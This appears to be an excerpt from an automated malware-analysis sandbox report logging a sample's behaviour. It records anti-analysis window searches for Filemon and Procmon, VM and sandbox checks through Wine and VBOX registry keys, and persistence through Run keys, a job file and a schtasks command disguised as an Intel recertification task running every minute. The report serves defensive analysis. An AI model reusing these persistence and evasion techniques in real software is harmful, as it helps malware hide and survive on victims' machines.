Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: Regmonclass
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Registry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Registry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe File opened: HKEY_CURRENT_USER\Software\Wine
